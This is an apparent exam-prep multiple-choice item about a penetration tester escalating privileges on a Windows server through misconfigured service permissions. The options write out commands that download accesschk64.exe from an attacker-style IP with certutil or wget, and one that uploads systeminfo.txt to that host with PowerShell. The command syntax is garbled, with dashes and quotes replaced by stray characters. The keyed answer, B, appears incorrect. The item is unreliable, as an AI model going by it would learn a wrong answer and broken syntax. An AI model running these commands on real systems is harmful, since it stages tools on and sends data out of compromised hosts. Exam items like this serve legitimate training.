A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process? 

Answer options:

A. certutil "urlcache "split "f http://192.168.2.124/windows-binaries/accesschk64.exe
B. powershell (New-Object System.Net.WebClient).UploadFile(˜http://192.168.2.124/upload.php`, ˜systeminfo.txt`)
C. schtasks /query /fo LIST /v | find /I Next Run Time:
D. wget http://192.168.2.124/windows-binaries/accesschk64.exe "O accesschk64.exe

B

Reference: https://infosecwriteups.com/privilege-escalation-in-windows-380bee3a2842